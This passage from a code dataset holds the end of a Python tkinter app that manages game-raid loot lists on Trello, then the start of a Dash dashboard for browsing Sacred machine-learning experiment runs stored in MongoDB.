Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef chosen_player(limit_type):\r\n if limit_type == \"Single\":\r\n if len(global_list.curselection()) == 1:\r\n slist = global_list\r\n selection = global_list.curselection()\r\n elif len(main_list.curselection()) == 1:\r\n slist = main_list\r\n selection = main_list.curselection()\r\n elif len(tier_list.curselection()) == 1:\r\n slist = tier_list\r\n selection = tier_list.curselection()\r\n else:\r\n log_list.insert(\"end\",\r\n \"Requires 1 selection.\")\r\n return False\r\n name = slist.get(selection)[:slist.get(selection).index(\" \")]\r\n return name\r\n elif limit_type == \"Extended\":\r\n names = []\r\n if len(global_list.curselection()) > 0:\r\n slist = global_list\r\n selection = global_list.curselection()\r\n elif len(main_list.curselection()) > 0:\r\n slist = main_list\r\n selection = main_list.curselection()\r\n elif len(tier_list.curselection()) > 0:\r\n slist = tier_list\r\n selection = tier_list.curselection()\r\n try:\r\n if selection:\r\n for label in selection:\r\n names.append(slist.get(label)\r\n [:slist.get(label).index(\" \")])\r\n return names\r\n except UnboundLocalError:\r\n log_list.insert(\"end\",\r\n \"No player selected.\")\r\n return False\r\n\r\n\r\ndef suicide(name, sklist):\r\n if not check_lists():\r\n log_list.insert(\"end\",\r\n \"Missing: pull/live\")\r\n return False\r\n qparams = auth\r\n if sklist == \"Main\":\r\n for card in current_data.main_live_cards:\r\n if card[\"name\"] == name:\r\n sk_data = {}\r\n sk_data[\"name\"] = name\r\n sk_data[\"main_id\"] = card[\"id\"]\r\n sk_data[\"main_pos\"] = card[\"pos\"]\r\n qparams[\"pos\"] = \"bottom\"\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{sk_data['main_id']}\",\r\n qparams,\r\n None).get_response()\r\n break\r\n for card in current_data.tier_live_cards:\r\n if card[\"name\"] == name:\r\n sk_data[\"tier_id\"] = card[\"id\"]\r\n sk_data[\"tier_pos\"] = card[\"pos\"]\r\n break\r\n try:\r\n del qparams[\"pos\"]\r\n except KeyError:\r\n print(f\"{name} not on live lists.\")\r\n log_list.insert(\"end\",\r\n f\"{name} not on live lists.\")\r\n return False\r\n sk_tracker.append(sk_data)\r\n event_log.info(f\"Main SK: {name}\")\r\n print(f\"Main SK: {name}\")\r\n log_list.insert(\"end\",\r\n f\"Main SK: {name}\")\r\n return True\r\n if sklist == \"Tier\":\r\n for card in current_data.main_live_cards:\r\n if card[\"name\"] == name:\r\n sk_data = {}\r\n sk_data[\"name\"] = name\r\n sk_data[\"main_id\"] = card[\"id\"]\r\n sk_data[\"main_pos\"] = card[\"pos\"]\r\n break\r\n for card in current_data.tier_live_cards:\r\n if card[\"name\"] == name:\r\n sk_data[\"tier_id\"] = card[\"id\"]\r\n sk_data[\"tier_pos\"] = card[\"pos\"]\r\n qparams[\"pos\"] = \"bottom\"\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{sk_data['tier_id']}\",\r\n qparams,\r\n None).get_response()\r\n break\r\n del qparams[\"pos\"]\r\n sk_tracker.append(sk_data)\r\n event_log.info(f\"Tier SK: {name}\")\r\n print(f\"Tier SK: {name}\")\r\n log_list.insert(\"end\",\r\n f\"Tier SK: {name}\")\r\n return True\r\n\r\n\r\ndef undosk():\r\n if len(sk_tracker) == 0:\r\n log_list.insert(\"end\",\r\n \"No SK to undo.\")\r\n return False\r\n global current_data\r\n qparams = auth\r\n qparams[\"pos\"] = sk_tracker[-1][\"main_pos\"]\r\n print(f\"Undo SK: {sk_tracker[-1]}\")\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{sk_tracker[-1]['main_id']}\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"pos\"] = sk_tracker[-1][\"tier_pos\"]\r\n resp2 = Trello(\"PUT\",\r\n f\"/1/cards/{sk_tracker[-1]['tier_id']}\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"pos\"]\r\n event_log.info(f\"SK undone: {sk_tracker[-1]['name']}\")\r\n print(f\"SK undone: {sk_tracker[-1]['name']}\")\r\n log_list.insert(\"end\",\r\n f\"SK undone: {sk_tracker[-1]['name']}\")\r\n sk_tracker.pop(-1)\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef merge_lists():\r\n global current_data\r\n if not check_lists():\r\n log_list.insert(\"end\",\r\n \"Missing: pull/live\")\r\n return False\r\n print(\"Merging Live lists into Pull lists...\\n\"\r\n \"This can take a while...\")\r\n qparams = auth\r\n try:\r\n i = 0\r\n while len(current_data.main_live_cards) > 0:\r\n if current_data.main_pull_cards[i][\"name\"] == \"-\":\r\n main_live_card_id = current_data.main_live_cards[0][\"id\"]\r\n main_pull_card_id = current_data.main_pull_cards[i][\"id\"]\r\n qparams[\"idList\"] = current_data.main_pull_id\r\n qparams[\"pos\"] = current_data.main_pull_cards[i][\"pos\"]\r\n print(\"Main merging \"\r\n f\"{current_data.main_live_cards[0]['name']}\")\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{main_live_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idList\"], qparams[\"pos\"]\r\n resp2 = Trello(\"DELETE\",\r\n f\"/1/cards/{main_pull_card_id}\",\r\n qparams,\r\n None).get_response()\r\n current_data = Trello_Data()\r\n i += 1\r\n except AttributeError as e:\r\n pass\r\n try:\r\n i = 0\r\n while len(current_data.tier_live_cards) > 0:\r\n if current_data.tier_pull_cards[i][\"name\"] == \"-\":\r\n tier_live_card_id = current_data.tier_live_cards[0][\"id\"]\r\n tier_pull_card_id = current_data.tier_pull_cards[i][\"id\"]\r\n qparams[\"idList\"] = current_data.tier_pull_id\r\n qparams[\"pos\"] = current_data.tier_pull_cards[i][\"pos\"]\r\n print(\"Tier merging \"\r\n f\"{current_data.tier_live_cards[0]['name']}\")\r\n resp3 = Trello(\"PUT\",\r\n f\"/1/cards/{tier_live_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idList\"], qparams[\"pos\"]\r\n resp4 = Trello(\"DELETE\",\r\n f\"/1/cards/{tier_pull_card_id}\",\r\n qparams,\r\n None).get_response()\r\n current_data = Trello_Data()\r\n i += 1\r\n except AttributeError as e:\r\n pass\r\n qparams[\"value\"] = 1\r\n try:\r\n resp5 = Trello(\"PUT\",\r\n f\"/1/lists/{current_data.main_live_id}/closed\",\r\n qparams,\r\n None).get_response()\r\n except AttributeError:\r\n pass\r\n try:\r\n resp6 = Trello(\"PUT\",\r\n f\"/1/lists/{current_data.tier_live_id}/closed\",\r\n qparams,\r\n None).get_response()\r\n except AttributeError:\r\n pass\r\n del qparams[\"value\"]\r\n print(\"Merged: live lists\")\r\n event_log.info(\"Merged: live lists\")\r\n log_list.insert(\"end\",\r\n \"Merged: live lists\")\r\n refresh_tklists()\r\n return True\r\n\r\n\r\n###############################################################################\r\n# Configure tkinter window\r\nwindow = Tk()\r\nwindow.geometry(\"680x1000\")\r\nwindow.config(bg=\"#202533\")\r\nwindow.title(\"Whiteclaw Clan Loot Master\")\r\ncanvas = Canvas(window, bg=\"#202533\", width=100, height=100)\r\nimg = PhotoImage(file=\"logo100x100.gif\")\r\ncanvas.create_image(50, 50, anchor=\"center\", image=img)\r\n\r\n# Global Frame\r\nglobal_label = Label(window, bg=\"#202533\", fg=\"#ffffff\",\r\n text=\"Global List | Log | Controls\")\r\nglobal_frame = Frame(window, bg=\"#202533\", borderwidth=5,\r\n relief=\"sunken\")\r\nglobal_list = Listbox(global_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n font=(\"Helvetica\", 12),\r\n height=20, width=25, selectmode=\"extended\",\r\n highlightcolor=\"#D94A66\",\r\n highlightthickness=\"3\",\r\n selectbackground=\"#D94A66\")\r\ngl_scrollbar = Scrollbar(global_frame, orient=\"vertical\")\r\ngl_scrollbar.config(command=global_list.yview, bg=\"#2c3b47\")\r\nglobal_list.config(yscrollcommand=gl_scrollbar.set)\r\nlog_list = Listbox(global_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n font=(\"Helvetica\", 12), height=20, width=25,\r\n highlightcolor=\"#D94A66\",\r\n highlightthickness=\"3\",\r\n selectbackground=\"#D94A66\")\r\nll_scrollbar = Scrollbar(global_frame, orient=\"vertical\")\r\nll_scrollbar.config(command=log_list.yview, bg=\"#2c3b47\")\r\nlog_list.config(yscrollcommand=ll_scrollbar.set)\r\n\r\n# Live Lists Frame\r\nlocal_label = Label(window, bg=\"#202533\", fg=\"#ffffff\",\r\n text=(f\"{config['trello']['main_live']} | \"\r\n f\"{config['trello']['tier_live']} | Filters\"))\r\nmain_frame = Frame(window, bg=\"#202533\", borderwidth=5, relief=\"raised\")\r\nmain_list = Listbox(main_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n font=(\"Helvetica\", 12), height=20, width=25,\r\n highlightcolor=\"#D94A66\",\r\n highlightthickness=\"3\",\r\n selectbackground=\"#D94A66\")\r\nml_scrollbar = Scrollbar(main_frame, orient=\"vertical\")\r\nml_scrollbar.config(command=main_list.yview, bg=\"#2c3b47\")\r\nmain_list.config(yscrollcommand=ml_scrollbar.set)\r\ntier_list = Listbox(main_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n font=(\"Helvetica\", 12), height=20, width=25,\r\n highlightcolor=\"#D94A66\",\r\n highlightthickness=\"3\",\r\n selectbackground=\"#D94A66\")\r\ntl_scrollbar = Scrollbar(main_frame, orient=\"vertical\")\r\ntl_scrollbar.config(command=main_list.yview, bg=\"#2c3b47\")\r\ntier_list.config(yscrollcommand=tl_scrollbar.set)\r\ncreate_pl_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=create_lists,\r\n text=\"Create pull/live lists\", width=25)\r\nadd_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=add_to_raid,\r\n text=\"Add player\", width=25)\r\nremove_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=remove_from_raid,\r\n text=\"Remove player\", width=25)\r\nmainsk_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=mainsk,\r\n text=\"Main SK\", width=25)\r\ntiersk_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=tiersk,\r\n text=\"Tier SK\", width=25)\r\nundo_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=undosk,\r\n text=\"Undo SK\", width=25)\r\nmerge_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=merge_lists,\r\n text=\"Merge lists\", width=25)\r\nfilters = {\"druid\": IntVar(), \"hunter\": IntVar(), \"mage\": IntVar(),\r\n \"paladin\": IntVar(), \"priest\": IntVar(), \"rogue\": IntVar(),\r\n \"shaman\": IntVar(), \"warlock\": IntVar(), \"warrior\": IntVar()}\r\ndruid_filter = Checkbutton(main_frame, text=\"Druid\",\r\n variable=filters[\"druid\"],\r\n bg=config[\"colors\"][\"druid\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nhunter_filter = Checkbutton(main_frame, text=\"Hunter\",\r\n variable=filters[\"hunter\"],\r\n bg=config[\"colors\"][\"hunter\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nmage_filter = Checkbutton(main_frame, text=\"Mage\",\r\n variable=filters[\"mage\"],\r\n bg=config[\"colors\"][\"mage\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\npaladin_filter = Checkbutton(main_frame, text=\"Paladin\",\r\n variable=filters[\"paladin\"],\r\n bg=config[\"colors\"][\"paladin\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\npriest_filter = Checkbutton(main_frame, text=\"Priest\",\r\n variable=filters[\"priest\"],\r\n bg=config[\"colors\"][\"priest\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nrogue_filter = Checkbutton(main_frame, text=\"Rogue\",\r\n variable=filters[\"rogue\"],\r\n bg=config[\"colors\"][\"rogue\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nshaman_filter = Checkbutton(main_frame, text=\"Shaman\",\r\n variable=filters[\"shaman\"],\r\n bg=config[\"colors\"][\"shaman\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nwarlock_filter = Checkbutton(main_frame, text=\"Warlock\",\r\n variable=filters[\"warlock\"],\r\n bg=config[\"colors\"][\"warlock\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\nwarrior_filter = Checkbutton(main_frame, text=\"Warrior\",\r\n variable=filters[\"warrior\"],\r\n bg=config[\"colors\"][\"warrior\"], fg=\"#000000\",\r\n font=(\"Helvetica\", 12),\r\n height=1, width=15, anchor=\"w\",\r\n highlightcolor=\"#D94A66\")\r\napply_filters = Button(main_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=refresh_tklists,\r\n text=\"Filter/Refresh\", width=25)\r\nmain_count_label = Label(main_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n text=f\"{config['trello']['main_live']}: 0\")\r\ntier_count_label = Label(main_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n text=f\"{config['trello']['tier_live']}: 0\")\r\n\r\n# Global List Frame\r\ncanvas.pack()\r\nglobal_label.pack()\r\nglobal_frame.pack()\r\nglobal_list.pack(fill=\"y\", side=\"left\")\r\ngl_scrollbar.pack(fill=\"y\", side=\"left\")\r\nlog_list.pack(side=\"left\", fill=\"y\")\r\nll_scrollbar.pack(side=\"left\", fill=\"y\")\r\ncreate_pl_button.pack(pady=5)\r\nadd_button.pack(pady=5)\r\nremove_button.pack(pady=5)\r\nmainsk_button.pack(pady=5)\r\ntiersk_button.pack(pady=5)\r\nundo_button.pack(pady=5)\r\nmerge_button.pack(pady=5)\r\n\r\n# Live Lists Frame\r\nlocal_label.pack()\r\nmain_frame.pack()\r\nmain_list.pack(side=\"left\", fill=\"y\")\r\nml_scrollbar.pack(side=\"left\", fill=\"y\")\r\ntier_list.pack(side=\"left\", fill=\"y\")\r\ntl_scrollbar.pack(side=\"left\", fill=\"y\")\r\ndruid_filter.pack(side=\"top\")\r\nhunter_filter.pack(side=\"top\")\r\nmage_filter.pack(side=\"top\")\r\npaladin_filter.pack(side=\"top\")\r\npriest_filter.pack(side=\"top\")\r\nrogue_filter.pack(side=\"top\")\r\nshaman_filter.pack(side=\"top\")\r\nwarlock_filter.pack(side=\"top\")\r\nwarrior_filter.pack(side=\"top\")\r\napply_filters.pack(pady=5)\r\nmain_count_label.pack()\r\ntier_count_label.pack()\r\n\r\n\r\n###############################################################################\r\n# Main logic\r\ndef main():\r\n refresh_tklists()\r\n window.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n main()\r\n except Exception as e:\r\n print(e)\r\n", "sub_path": "__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 34130, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 23, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 25, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "requests.request", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "2554185", "text": "# -*- coding: utf-8 -*-\nimport base64\nfrom glob import glob\n\nimport dash\nimport dash_table_experiments as dt\nfrom dash.dependencies import Input, Output\n\nfrom db_tools import *\nfrom utils import *\n\nclient = pymongo.MongoClient('drunk:27017')\napp = dash.Dash()\n\nexternal_css = [\n \"https://cdnjs.cloudflare.com/ajax/libs/normalize/7.0.0/normalize.min.css\", # Normalize the CSS\n \"https://fonts.googleapis.com/css?family=Open+Sans|Roboto\" # Fonts\n \"https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\",\n \"https://cdn.rawgit.com/xhlulu/0acba79000a3fd1e6f552ed82edb8a64/raw/dash_template.css\",\n \"https://rawgit.com/plotly/dash-live-model-training/master/custom_styles.css\"\n]\n\nfor css in external_css:\n app.css.append_css({\"external_url\": css})\n\ndbl = client.list_database_names()\ndatabase_list = []\nfor i in dbl:\n database_list.append({'label': i, 'value': i})\n\napp.layout = html.Div([\n html.H1(\"Sacred Database\",\n style={'display': 'inline',\n 'float': 'left',\n 'font-size': '2.65em',\n 'margin-left': '7px',\n 'font-weight': 'bolder',\n 'font-family': 'Product Sans',\n 'color': \"rgba(117, 117, 117, 0.95)\",\n 'margin-top': '20px',\n 'margin-bottom': '0'\n }\n ),\n\n dcc.Dropdown(\n id='database',\n options=database_list,\n value='arthur_exp_database',\n searchable=False,\n clearable=False,\n ),\n\n html.Div(id='output-container'),\n\n dcc.Dropdown(\n id='expe',\n placeholder=\"select a expe\",\n multi=True,\n clearable=True,\n ),\n\n dcc.Checklist(\n id='checklist',\n options=[\n {'label': 'Running', 'value': 'RUNNING'},\n {'label': 'Completed', 'value': 'COMPLETED'},\n {'label': 'Died', 'value': 'TIMEOUT'},\n {'label': 'Failed', 'value': 'FAILED'},\n {'label': 'Interrupted', 'value': 'INTERRUPTED'},\n {'label': 'Discriminator too small', 'value': 'DIS_TOO_SMALL'},\n {'label': 'Start Result too small', \"value\": \"START_RESULT_TOO_SMALL\"},\n ],\n values=['COMPLETED', 'RUNNING']\n ),\n html.Label('Max result'),\n html.Div(children=[\n html.Div(children=[\n dcc.Slider(\n id='range',\n min=0,\n max=5,\n step=0.01,\n value=1,\n marks={\n 0: {'label': '0', 'style': {'color': '#77b0b1'}},\n 0.05: {'label': '0.05', 'style': {'color': '#77b0b1'}},\n 0.1: {'label': '0.1', 'style': {'color': '#77b0b1'}},\n 0.25: {'label': '0.25'},\n 0.5: {'label': '0.5'},\n 1: {'label': '1'},\n 5: {'label': 'inf'},\n\n },\n\n )], style={'width': '75%', 'float': 'left', 'display': 'inline-block'}),\n html.Div(id='range_value', style={'width': '15%', 'float': 'right', 'display': 'inline-block'})\n ]),\n\n html.Div(\n children=[\n html.H4('Datatable '),\n dt.DataTable(\n # Initialise the rows\n rows=[{}],\n sortable=True,\n selected_row_indices=[],\n id='table')\n ], style={'marginBottom': 5, 'marginTop': 75}\n ),\n\n dcc.Tabs(id=\"tabs\", children=[\n dcc.Tab(label='Curve', children=[\n html.Div([\n html.Div([\n dcc.Dropdown(\n id='expe_list_curve',\n placeholder=\"select experiments\",\n multi=False,\n clearable=True,\n ),\n dcc.Dropdown(\n id='metric_list_curve',\n placeholder=\"select metrics\",\n multi=False,\n value='loss_MSE',\n clearable=True,\n ),\n ]),\n html.Div(id='run-log-storage', style={'display': 'none'}),\n div_graph('jojo')\n ])\n ]),\n dcc.Tab(label='Images', children=[\n html.Div([\n html.Div([\n dcc.Dropdown(\n id='expe_list_image',\n placeholder=\"select experiments\",\n multi=False,\n clearable=True,\n ),\n ]),\n dcc.RadioItems(id='train_or_test',\n options=[\n {'label':'Train', 'value': 'train'},\n {'label':'Test', 'value': 'test'}\n ], value='test'\n ),\n html.Div(children=[\n html.Div(children=[\n dcc.Slider(\n id='slider_img',\n min=0,\n max=100,\n step=1,\n value=1,\n marks={\n 0: {'label': '0', 'style': {'color': '#77b0b1'}},\n 25: {'label': '25', 'style': {'color': '#77b0b1'}},\n 50: {'label': '50'},\n 75: {'label': '75'},\n 100: {'label': '100'},\n },\n\n )], style={'width': '75%', 'float': 'left', 'display': 'inline-block'}),\n html.Div(id='img_number', style={'width': '15%', 'float': 'right', 'display': 'inline-block'})\n ]),\n html.Img(id=\"image_exp\")\n\n ])\n ]),\n dcc.Tab(label='Hyperparameters', children=[\n html.Div([\n dcc.RadioItems(\n id='float_or_box',\n options=[{'label': i, 'value': i} for i in ['scatter', 'box']],\n value='scatter'\n ),\n dcc.Dropdown(\n id='config',\n placeholder=\"select an hyperparameter\",\n # multi=True,\n clearable=True,\n ),\n html.Div(id='box-plot')\n ])\n ]),\n\n ], )\n\n], style={'marginBottom': 250, 'marginTop': 25, 'marginLeft': 15, 'marginRight': 15})\n\n\n@app.callback(\n Output('output-container', 'children'),\n [Input('database', 'value')])\ndef update_output(value):\n db = client[value]\n db_stat = db.command(\"dbstats\")\n retour = \"{} num_object : {} avgObjSize : {} datasize : {}\".format(\n db_stat['db'],\n db_stat['objects'],\n convert_size(db_stat['avgObjSize']),\n convert_size(db_stat['dataSize']),\n )\n return retour\n\n@app.callback(\n Output('expe', 'options'),\n [Input('database', 'value')])\ndef update_scrolldown(value):\n db = client[value]\n l = db.runs.distinct('experiment.name')\n c = []\n for i in l:\n c.append({'label': i, 'value': i})\n return c\n\n@app.callback(\n Output('range_value', 'children'),\n [Input('range', 'value')])\ndef range_value(value):\n return \"max : \" + str(value)\n\n\n@app.callback(Output('table', 'rows'),\n [Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value')])\ndef update_table(expe_name, value, completed, range_res):\n \"\"\"\n For user selections, return the relevant table\n \"\"\"\n db = client[value]\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n #if range_res < 5:\n # filtre['result'] = {}#'$lt': range_res}\n\n if expe_name is not None:\n if db.runs.find(filtre).count() == 0:\n df = pd.DataFrame({'_id': [00], 'result': [10000], 'start_time': ['2018-07-02 09:58:15.077000'], 'status': ['FAILED'], 'experiment.name': ['NO EXPERIMENT'], 'host.hostname': ['NONE']})\n\n return df.to_dict('records')\n\n # meters/loss_masked_MSE/test\n\n def get_metric(x, metrics_name, db):\n retour = 10000\n if \"info\" in x:\n\n metrics = x[\"info\"][\"metrics\"]\n df_dict = {}\n for k in metrics:\n for kk in db.metrics.find({'_id': ObjectId(k['id']), \"name\": metrics_name}):\n retour = np.min(kk[\"values\"])\n\n return retour, len(kk[\"values\"])\n\n def get_max_epoch(x, metrics_name, db):\n retour = 10000\n if \"info\" in x:\n\n metrics = x[\"info\"][\"metrics\"]\n df_dict = {}\n for k in metrics:\n for kk in db.metrics.find({'_id': ObjectId(k['id']), \"name\": metrics_name}):\n retour = np.min(kk[\"values\"])\n\n return len(kk[\"values\"])\n\n custom_cols = {\n 'max_epoch': lambda x: get_max_epoch(x, \"meters/loss_dis/train\", db), \n }\n # 'min_masked_mse': lambda x: get_metric(x, \"meters/loss_masked_MSE/test\", db),\n # 'min_masked_std': lambda x: get_metric(x, \"meters/loss_masked_std/test\", db),\n\n df = get_results(db.runs, project={'start_time': True,\n \"status\": True,\n \"host.hostname\": True,\n \"experiment.name\": True,\n \"info.exp_dir\": True,\n },\n filter_by=filtre, include_index=True, prune=False, custom_cols=custom_cols)\n else:\n df = pd.DataFrame({'A' : []})\n\n return df.to_dict('records')\n\n\n\n#\n# TAB HYPERPARAMATERS\n@app.callback(Output('config', 'options'),\n [\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value'),\n ])\ndef update_config_name(expe_name, value, completed, range_res):\n db = client[value]\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n filtre['result'] = {'$lt': range_res}\n l_hyper = []\n skip_cols = [\"config.device\", \"config.seed\", \"config.niter\", \"result\"]\n\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n df = get_results(db.runs, filter_by=filtre, include_index=True)\n\n for i in df.columns:\n\n if i in skip_cols:\n continue\n val = i[7:]\n l_hyper.append({'label': val, 'value': i}, )\n\n if len(l_hyper) == 0:\n l_hyper.append({'label': 'pas de hyper', value: 0})\n\n return l_hyper\n\n\n@app.callback(Output('box-plot', 'children'),\n [\n Input('config', 'value'),\n Input('float_or_box', 'value'),\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value')\n ])\ndef update_config_plot(box_value, float_or_box, expe_name, value, completed, range_res):\n db = client[value]\n\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n filtre['result'] = {'$lt': range_res}\n if expe_name is None:\n return\n if db.runs.find(filtre).count() == 0:\n return\n df = get_results(db.runs, filter_by=filtre, include_index=True)\n data = []\n if box_value is None:\n return \"Il n'y a rien a afficher pour l'instant\"\n\n if float_or_box == 'scatter':\n fig = float_to_scatter(df, box_value)\n else:\n df[box_value] = df[box_value].fillna(value='nan')\n df[box_value] = pd.Categorical(df[box_value])\n data += cat_to_boxplot(df, box_value)\n\n layout = go.Layout(\n title=\"Hyperparameter\"\n )\n fig = go.Figure(data=data, layout=layout)\n\n g = dcc.Graph(figure=fig, id='coco_lasticot')\n\n return g\n\n\n# # TAB CURVE\n@app.callback(Output('expe_list_curve', 'options'),\n [Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input(\"range\", 'value')])\ndef update_expe_list_curve(expe_name, value, completed, range_res):\n db = client[value]\n\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n if range_res < 5:\n filtre['result'] = {'$lt': range_res}\n l_retour = []\n\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n\n df = get_results(db.runs, filter_by=filtre, project={'start_time': True,\n \"status\": True,\n \"host.hostname\": True,\n \"experiment.name\": True\n }, include_index=True, prune=False)\n for row in df.iterrows():\n l_retour.append({'label': \"{}_{}_{}\".format(row[1][\"_id\"],\n row[1][\"result\"],\n row[1][\"experiment.name\"]),\n 'value': row[1][\"_id\"]})\n\n\n return sorted(l_retour, key=lambda k: k['label'].split('_')[1])\n\n\n\n@app.callback(Output('metric_list_curve', 'options'),\n [\n Input('expe_list_curve', 'value'),\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value')])\ndef update_metrics_list_curve(expe_id, expe_name, value, completed, range_res):\n db = client[value]\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n filtre['_id'] = expe_id\n list_metric_name = []\n\n if expe_name is not None:\n if db.runs.find(filtre).count() > 0:\n\n for l in db.runs.find(filtre):\n metrics = l['info']['metrics']\n\n for m in metrics:\n list_metric_name.append(m['name'].split('/')[1])\n list_metric_name = np.unique(list_metric_name)\n else:\n list_metric_name = ['no metrics']\n\n return [{'label': i, 'value':i} for i in list_metric_name]\n\n\n@app.callback(Output('run-log-storage', 'children'),\n [\n Input('expe_list_curve', 'value'),\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value'),])\ndef get_run_log(expe_id, expe_name, value, completed, range_res):\n db = client[value]\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n filtre['result'] = {'$lt': range_res}\n filtre['_id'] = expe_id\n json = ''\n if expe_name is not None:\n if db.runs.find(filtre).count() == 0:\n return\n\n for l in db.runs.find(filtre):\n metrics = l['info']['metrics']\n\n\n df_dict = {}\n for i in metrics:\n n = i['name']\n for kk in db.metrics.find({'_id': ObjectId(i['id'])}):\n v = kk['values']\n df_dict[n] = v\n df_dict['step'] = kk['steps']\n run_log_df = pd.DataFrame.from_dict(df_dict, orient='index')\n run_log_df = run_log_df.transpose()\n try:\n json = run_log_df.to_json(orient='split')\n except FileNotFoundError as error:\n print(error)\n print(\"Please verify if the csv file generated by your model is placed in the correct directory.\")\n return None\n\n return json\n\n\n@app.callback(Output('div-jojo-graph', 'children'),\n [Input('run-log-storage', 'children'),\n Input('radio-display-mode-jojo', 'value'),\n Input('checklist-smoothing-options-jojo', 'values'),\n Input('slider-smoothing-jojo', 'value'),\n Input('metric_list_curve', 'value')])\ndef update_accuracy_graph(log_storage, display_mode,\n checklist_smoothing_options,\n slider_smoothing,\n metric_name):\n\n graph = update_graph('accuracy-graph',\n metric_name,\n 'meters/'+metric_name+'/train',\n 'meters/'+metric_name+'/test',\n log_storage,\n display_mode,\n checklist_smoothing_options,\n slider_smoothing,\n metric_name)\n\n try:\n if display_mode in ['separate_horizontal', 'overlap']:\n graph.figure.layout.yaxis['range'] = [0, 1]\n else:\n graph.figure.layout.yaxis1['range'] = [0, 1]\n graph.figure.layout.yaxis2['range'] = [0, 1]\n\n except AttributeError:\n pass\n\n return [graph]\n#\n# # IMAGE TAB\n#\n#\n@app.callback(\n Output('img_number', 'children'),\n [Input('slider_img', 'value')])\ndef range_value(value):\n return \"img : \" + str(value)\n\n\n@app.callback(Output('expe_list_image', 'options'),\n [\n Input('expe', 'value'),\n Input('database', 'value'),\n Input('checklist', 'values'),\n Input('range', 'value')\n ])\ndef update_expe_list_image(expe_name, value, completed, range_res):\n db = client[value]\n\n filtre = {'experiment.name': {'$in': expe_name}}\n filtre['status'] = {'$in': completed}\n #if range_res < 